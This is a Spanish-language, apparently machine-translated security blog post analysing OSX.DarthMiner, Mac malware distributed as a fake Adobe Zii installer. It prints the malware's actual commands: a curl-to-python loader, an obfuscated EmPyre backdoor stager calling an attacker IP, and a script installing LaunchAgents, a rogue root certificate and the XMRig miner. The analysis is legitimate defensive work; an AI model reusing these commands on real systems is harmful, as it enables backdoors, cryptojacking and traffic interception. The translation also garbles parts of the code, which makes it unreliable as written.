Publicado: 7 de diciembre de 2018 por Thomas Reed
A principios de esta semana, descubrimos una nueva pieza de malware para Mac que combina dos herramientas de código abierto diferentes, la puerta trasera EmPyre y el cryptominer XMRig, con el propósito del mal.
El malware se distribuía a través de una aplicación llamada Adobe Zii. Adobe Zii es un software diseñado para ayudar en la piratería de una variedad de aplicaciones de Adobe. En este caso, sin embargo, la aplicación se llamaba Adobe Zii, pero definitivamente no era la cosa real.
Como se puede ver en las capturas de pantalla anteriores, el software real Adobe Zii, a la izquierda, utiliza el logotipo de Adobe Creative Cloud. (Después de todo, si va a escribir un software para ayudar a las personas a robar el software de Adobe, ¿por qué no robar el logotipo también?) Sin embargo, el instalador de malware utiliza un icono genérico de applet Automator.
Al abrir la aplicación Adobe Zii falsa con Automator se revela la naturaleza del software, ya que simplemente ejecuta un script de shell:
curl https://ptpb.pw/jj9a | python - & s = 46.226.108.171: 80; curl $ s / sample.zip -o sample.zip; descomprimir sample.zip -d muestra; muestra de cd; cd __MACOSX; abrir -a sample.app
Esta secuencia de comandos está diseñada para descargar y ejecutar una secuencia de comandos de Python, luego descargar y ejecutar una aplicación llamada sample.app.
El sample.app es simple. Parece ser simplemente una versión de Adobe Zii, probablemente con el propósito de hacer que parezca que el malware es realmente «legítimo». (Esto no implica que la piratería de software sea legítima, por supuesto, sino que significa que el malware intentaba parecer que estaba haciendo lo que el usuario pensaba que tenía la intención de hacer.)
¿Qué pasa con el script de Python? Resultó estar ofuscado, pero se pudo desenfocar fácilmente, revelando el siguiente script:
import sys; import re, subprocess; cmd = "ps -ef | grep Little \ Snitch | grep -v grep" ps = subprocess.Popen (cmd, shell = True, stdout = subprocess.PIPE) out = ps.stdout.read () ps.stdout.close () Si re.search ("Little Snitch", fuera): sys.exit () importar urllib2; UA = 'Mozilla / 5.0 (Windows NT 6.1; WOW64; Trident / 7.0; rv: 11.0) como Gecko'; server = 'http: //46.226.108.171: 4444'; t = '/ news.php'; req = urllib2.Request (servidor + t); req.add_header ('User-Agent', UA); req.add_header ('Cookie', "session = SYDFioywtcFbUR5U3EST96SbqVk ="); proxy = urllib2.ProxyHandler (); o = urllib2.build_opener (proxy); urllib2.install_opener (o); a = urllib2.urlopen (req) .read (); IV = a [0: 4]; datos = a [4:]; clave = IV + '3f239f68a035d40e1891d8b5fdf032d3'; S, j, out = rango (256), 0, [] para i en rango (256): j = (j + S [i] + ord (clave [i% len (clave)]))% 256 S [i], S [j] = S [j], S [i] i = j = 0 para los datos de char: i = (i + 1)% 256 j = (j + S [i])% 256 S [i], S [j] = S [j], S [i] out.append (chr (ord (char) ^ S [(S [i] + S [j])% 256])) exec (''. join (out))
Lo primero que hace este script es buscar la presencia de Little Snitch, un cortafuegos saliente de uso común que sería capaz de llamar la atención de los usuarios a la conexión de la red de puerta trasera. Si Little Snitch está presente, el malware se rescata. (Por supuesto, si se instalara un cortafuegos saliente como Little Snitch, ya habría bloqueado la conexión que habría intentado descargar este script, por lo que no vale la pena comprobar en este punto).
Este script abre una conexión a un backend de EmPyre, que es capaz de enviar comandos arbitrarios a la Mac infectada. Una vez que la puerta trasera está abierta, recibe un comando que descarga el siguiente script a /private/tmp/uploadminer.sh y lo ejecuta:
# osascript -e "do shell script \" networksetup -setsecurewebproxy "Wi-Fi" 46.226.108.171 8080 && networksetup -setwebproxy "Wi-Fi" 46.226.108.171 8080 && curl -x http://46.226.108.171:8080 http: //mitm.it/cert/pem -o verysecurecert.pem && security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain verysecurecert.pem \ "con privilegios de administrador" cd ~ / Library / LaunchAgents curl -o com.apple.rig.plist http://46.226.108.171/com.apple.rig.plist curl -o com.proxy.initialize.plist http://46.226.108.171/com.proxy.initialize.plist launchctl load -w com.apple.rig.plist launchctl load -w com.proxy.initialize.plist cd / Usuarios / Compartido curl -o config.json http://46.226.108.171/config.json curl -o xmrig http://46.226.108.171/xmrig chmod + x ./xmrig rm -rf ./xmrig2 rm -rf ./config2.json ./xmrig -c config.json &
Este script descarga e instala los otros componentes del malware. Se creó un agente de lanzamiento llamado com.proxy.initialize.plist para mantener la puerta trasera abierta de forma persistente ejecutando exactamente el mismo script de Python ofuscado mencionado anteriormente.
El script también descarga el cryptominer XMRig y un archivo de configuración en la carpeta / Users / Shared /, y configura un agente de inicio llamado com.apple.rig.plist para mantener el proceso XMRig en ejecución con esa configuración activa. (El nombre de «com.apple» es una señal de alerta inmediata que fue la causa raíz del descubrimiento de este malware).
Curiosamente, hay un código en esa secuencia de comandos para descargar e instalar un certificado raíz asociado con el software mitmproxy, que es un software capaz de interceptar todo el tráfico web, incluido (con la ayuda del certificado) tráfico «https» cifrado. Sin embargo, ese código fue comentado, lo que indica que no estaba activo.
En la superficie, este malware parece ser bastante inofensivo. Los cryptominers normalmente solo hacen que la computadora se ralentice, gracias a un proceso que absorbe toda la CPU / GPU.
Sin embargo, esto no es sólo un cryptominer. Es importante tener en cuenta que el cryptominer se instaló a través de un comando emitido por la puerta trasera, y es muy posible que haya habido otras órdenes arbitrarias enviadas a Macs infectadas por la puerta trasera en el pasado. Es imposible saber exactamente qué daño podría haber hecho este malware a los sistemas infectados. El hecho de que solo hayamos observado el comportamiento de la minería no significa que nunca haya hecho otras cosas.
Malwarebytes para Mac detecta este malware como OSX.DarthMiner. Si está infectado, es imposible decir qué otra cosa pudo haber hecho el malware además de criptominar. Es totalmente posible que pueda haber archivos exfiltrados o contraseñas capturadas.
Hay una lección importante que aprender de esto. Se sabe que la piratería de software es una de las actividades más riesgosas que puede realizar en su Mac. El peligro de infección es alto, y esto no es nuevo, sin embargo, las personas aún participan en este comportamiento. Por favor, en el futuro, hágase un favor y no piratee el software. Los costos pueden ser mucho más altos que comprar el software que intenta obtener de forma gratuita.
Sobre el autor